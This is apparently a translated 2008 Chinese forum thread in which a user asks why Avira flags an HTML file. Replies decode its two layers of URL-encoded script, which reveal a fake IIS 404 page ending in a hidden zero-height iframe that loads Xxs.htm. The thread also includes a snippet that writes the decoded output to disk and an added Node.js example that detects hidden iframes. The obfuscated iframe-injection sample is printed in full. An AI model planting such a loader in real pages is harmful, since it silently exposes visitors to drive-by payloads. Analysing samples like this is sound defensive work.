
[Suspicious file] Avira flags this code as a virus.

xinyv
Posted on 2008-1-24 13:45:04
As soon as this is saved as html, it gets flagged as a virus. Could an expert take a look at what this is?
<html>

<head>
<base>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21%2D%2D%0D%0Avar%20Words%20%3D%22%253C%2521DOCTYPE%2520HTML%2520PUBLIC%2520%2522%252D%252F%252FW3C%252F%252FDTD%2520HTML%25204%252E01%252F%252FEN%2522%2520%2522http%253A%252F%252Fwww%252Ew3%252Eorg%252FTR%252Fhtml4%252Fstrict%252Edtd%2522%253E%250D%250A%253CHTML%253E%253CHEAD%253E%253CTITLE%253E%25u65E0%25u6CD5%25u627E%25u5230%25u8BE5%25u9875%253C%252FTITLE%253E%250D%250A%253CMETA%2520HTTP%252DEQUIV%253D%2522Content%252DType%2522%2520Content%253D%2522text%252Fhtml%253B%2520charset%253DGB2312%2522%253E%250D%250A%253CSTYLE%2520type%253D%2522text%252Fcss%2522%253E%250D%250A%2520%2520BODY%2520%257B%2520font%253A%25209pt%252F12pt%2520%25u5B8B%25u4F53%2520%257D%250D%250A%2520%2520H1%2520%257B%2520font%253A%252012pt%252F15pt%2520%25u5B8B%25u4F53%2520%257D%250D%250A%2520%2520H2%2520%257B%2520font%253A%25209pt%252F12pt%2520%25u5B8B%25u4F53%2520%257D%250D%250A%2520%2520A%253Alink%2520%257B%2520color%253A%2520red%2520%257D%250D%250A%2520%2520A%253Avisited%2520%257B%2520color%253A%2520maroon%2520%257D%250D%250A%253C%252FSTYLE%253E%250D%250A%253C%252FHEAD%253E%253CBODY%253E%253CTABLE%2520width%253D500%2520border%253D0%2520cellspacing%253D10%253E%253CTR%253E%253CTD%253E%250D%250A%253Ch1%253E%25u65E0%25u6CD5%25u627E%25u5230%25u8BE5%25u9875%253C%252Fh1%253E%250D%250A%25u60A8%25u6B63%25u5728%25u641C%25u7D22%25u7684%25u9875%25u9762%25u53EF%25u80FD%25u5DF2%25u7ECF%25u5220%25u9664%25u3001%25u66F4%25u540D%25u6216%25u6682%25u65F6%25u4E0D%25u53EF%25u7528%25u3002%250D%250A%253Chr%253E%250D%250A%253Cp%253E%25u8BF7%25u5C1D%25u8BD5%25u4EE5%25u4E0B%25u64CD%25u4F5C%25uFF1A%253C%252Fp%253E%250D%250A%253Cul%253E%250D%250A%253Cli%253E%25u786E%25u4FDD%25u6D4F%25u89C8%25u5668%25u7684%25u5730%25u5740%25u680F%25u4E2D%25u663E%25u793A%25u7684%25u7F51%25u7AD9%25u5730%25u5740%25u7684%25u62FC%25u5199%25u548C%25u683C%25u5F0F%25u6B63%25u786E%25u65E0%25u8BEF%25u3002%253C%252Fli%253E%250D%250A%253Cli%253E%25u5982%25u679C%25u901A%25u8FC7%25u5355%25u51FB%25u94FE%25u63A5%25u800C%25u5230%25u8FBE%25u4E86%25u8BE5%25u7F51%25u9875%25uFF0C%25u8BF7%25u4E0E%25u7F51%25u7AD9%25u7BA1%25u7406%25u5458%25u8054%25u7CFB%25uFF0C%25u901A%25u77E5%25u4ED6%25u4EEC%25u8BE5%25u94FE%25u63A5%25u7684%25u683C%25u5F0F%25u4E0D%25u6B63%25u786E%25u3002%250D%250A%253C%252Fli%253E%250D%250A%253Cli%253E%25u5355%25u51FB%253Ca%2520href%253D%2522javascript%253Ahistory%252Eback%25281%2529%2522%253E%25u540E%25u9000%253C%252Fa%253E%25u6309%25u94AE%25u5C1D%25u8BD5%25u53E6%25u4E00%25u4E2A%25u94FE%25u63A5%25u3002%253C%252Fli%253E%250D%250A%253C%252Ful%253E%250D%250A%253Ch2%253EHTTP%2520%25u9519%25u8BEF%2520404%2520%252D%2520%25u6587%25u4EF6%25u6216%25u76EE%25u5F55%25u672A%25u627E%25u5230%25u3002%253Cbr%253EInternet%2520%25u4FE1%25u606F%25u670D%25u52A1%2520%2528IIS%2529%253C%252Fh2%253E%250D%250A%253Chr%253E%250D%250A%253Cp%253E%25u6280%25u672F%25u4FE1%25u606F%25uFF08%25u4E3A%25u6280%25u672F%25u652F%25u6301%25u4EBA%25u5458%25u63D0%25u4F9B%25uFF09%253C%252Fp%253E%250D%250A%253Cul%253E%250D%250A%253Cli%253E%25u8F6C%25u5230%2520%253Ca%2520href%253D%2522http%253A%252F%252Fgo%252Emicrosoft%252Ecom%252Ffwlink%252F%253Flinkid%253D8180%2522%253EMicrosoft%2520%25u4EA7%25u54C1%25u652F%25u6301%25u670D%25u52A1%253C%252Fa%253E%25u5E76%25u641C%25u7D22%25u5305%25u62EC%2526ldquo%253BHTTP%2526rdquo%253B%25u548C%2526ldquo%253B404%2526rdquo%253B%25u7684%25u6807%25u9898%25u3002%253C%252Fli%253E%250D%250A%253Cli%253E%25u6253%25u5F00%2526ldquo%253BIIS%2520%25u5E2E%25u52A9%2526rdquo%253B%25uFF08%25u53EF%25u5728%2520IIS%2520%25u7BA1%25u7406%25u5668%2520%2528inetmgr%2529%2520%25u4E2D%25u8BBF%25u95EE%25uFF09%25uFF0C%25u7136%25u540E%25u641C%25u7D22%25u6807%25u9898%25u4E3A%2526ldquo%253B%25u7F51%25u7AD9%25u8BBE%25u7F6E%2526rdquo%253B%25u3001%2526ldquo%253B%25u5E38%25u89C4%25u7BA1%25u7406%25u4EFB%25u52A1%2526rdquo%253B%25u548C%2526ldquo%253B%25u5173%25u4E8E%25u81EA%25u5B9A%25u4E49%25u9519%25u8BEF%25u6D88%25u606F%2526rdquo%253B%25u7684%25u4E3B%25u9898%25u3002%253C%252Fli%253E%250D%250A%253C%252Ful%253E%250D%250A%250D%250A%253C%252FTD%253E%253C%252FTR%253E%253C%252FTABLE%253E%253C%252FBODY%253E%253C%252FHTML%253E%250D%250A%253Ciframe%2520src%253DXxs%252Ehtm%2520width%253D50%2520height%253D0%253E%253C%252Fiframe%253E%250D%250A%22%0D%0Afunction%20SetNewWords%28%29%0D%0A%7B%0D%0Avar%20NewWords%3B%0D%0ANewWords%20%3D%20unescape%28Words%29%3B%0D%0Adocument%2Ewrite%28NewWords%29%3B%0D%0A%7D%0D%0ASetNewWords%28%29%3B%0D%0A%2F%2F%20%2D%2D%3E%0D%0A%3C%2FSCRIPT%3E%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3C%2FHTML%3E%0D%0A"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<body>

</body>

</html>
qianwenxiang
Posted on 2008-1-24 17:37:52
After decoding twice:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
  BODY { font: 9pt/12pt 宋体 }
  H1 { font: 12pt/15pt 宋体 }
  H2 { font: 9pt/12pt 宋体 }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作:</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
</li>
<li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息(为技术支持人员提供)</p>
<ul>
<li>转到 <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 产品支持服务</a>并搜索包括&ldquo;HTTP&rdquo;和&ldquo;404&rdquo;的标题。</li>
<li>打开&ldquo;IIS 帮助&rdquo;(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为&ldquo;网站设置&rdquo;、&ldquo;常规管理任务&rdquo;和&ldquo;关于自定义错误消息&rdquo;的主题。</li>
</ul>

</TD></TR></TABLE></BODY></HTML>
<iframe src=Xxs.htm width=50 height=0></iframe>

Which URL did you see this code at?
tanlimo
Posted on 2008-1-24 18:52:18
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>鄀誰~b0R鍕u?/TITLE>
<META HTTP-EQUIV="Content-Type" C>
<STYLE type="text/css">
  BODY { font: 9pt/12pt 媅SO }
  H1 { font: 12pt/15pt 媅SO }
  H2 { font: 9pt/12pt 媅SO }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>鄀誰~b0R鍕u?/h1>
╜ck(Wd"}剉u榖楋S齹騗蟸 Rd?0鬴
Tb俧鰁
N颯(u0
<hr>
<p>鲖\諎錘 N蚫\O
qianwenxiang
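Posted on 2008-1-24 20:46:38

Reply to tanlimo's post (#3)

// Writes the decoded text to a file instead of rendering it with document.write.
function saveHtml() {
    var NewWords;
    NewWords = unescape(Words);
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    // 2 = ForWriting, true = create the file if it does not exist
    var f = fso.OpenTextFile("C:\\1.html", 2, true);
    f.Write(NewWords);
    f.Close();
    fso = f = void(0);
}
window.onload = saveHtml;

Just change that document.write part below and it will output the decrypted content.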
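
Added example (not part of the original thread): a static way to do what the replies above did by hand, peeling the nested `unescape` layers under Node.js without rendering the page, then listing any invisible iframe in the last layer. The sample input is constructed to mirror the posted file's structure (`var Words`, two layers, `Xxs.htm`); `peelLayers` and `hiddenIframes` are hypothetical helper names.

```javascript
// Added example: static analysis only, nothing is rendered or executed.
// Constructed sample mirroring the posted file: two escape() layers around
// a fake error page that ends in a zero-height iframe.
const innerPage = '<TITLE>无法找到该页</TITLE>\r\n' +
  '<iframe src=Xxs.htm width=50 height=0></iframe>\r\n';
const layer1 = '<SCRIPT>\r\nvar Words ="' + escape(innerPage) + '"\r\n' +
  'document.write(unescape(Words));\r\n</SCRIPT>';
const sample = '<html><SCRIPT>\nvar Words ="' + escape(layer1) + '"\n' +
  'document.write(unescape(Words));\n</SCRIPT></html>';

// Hypothetical helper: follow `var Words = "..."` through each unescape layer.
function peelLayers(html, maxDepth = 10) {
  const layers = [];
  let current = html;
  for (let i = 0; i < maxDepth; i++) {
    const m = /var\s+Words\s*=\s*"([^"]*)"/.exec(current);
    if (!m) break;                       // no further encoded layer
    // Drop raw line breaks that copy/paste may have inserted into the literal.
    current = unescape(m[1].replace(/[\r\n]/g, ''));
    layers.push(current);
  }
  return layers;
}

// Hypothetical helper: report iframes that are sized or styled to be invisible.
function hiddenIframes(html) {
  const found = [];
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0];
    const zeroSize = /\b(?:width|height)\s*=\s*["']?0(?:px)?\b/i.test(tag);
    const styledOut = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
    if (zeroSize || styledOut) {
      const src = /\bsrc\s*=\s*["']?([^\s"'>]+)/i.exec(tag);
      found.push(src ? src[1] : '(no src)');
    }
  }
  return found;
}

const layers = peelLayers(sample);
const finalLayer = layers[layers.length - 1];
console.log('layers decoded:', layers.length);
console.log('hidden iframes:', hiddenIframes(finalLayer));
```

Because `unescape` also handles the `%uXXXX` form, the Chinese text comes back as proper Unicode in the JavaScript string, so any garbling would come from how the result is written out or viewed afterwards.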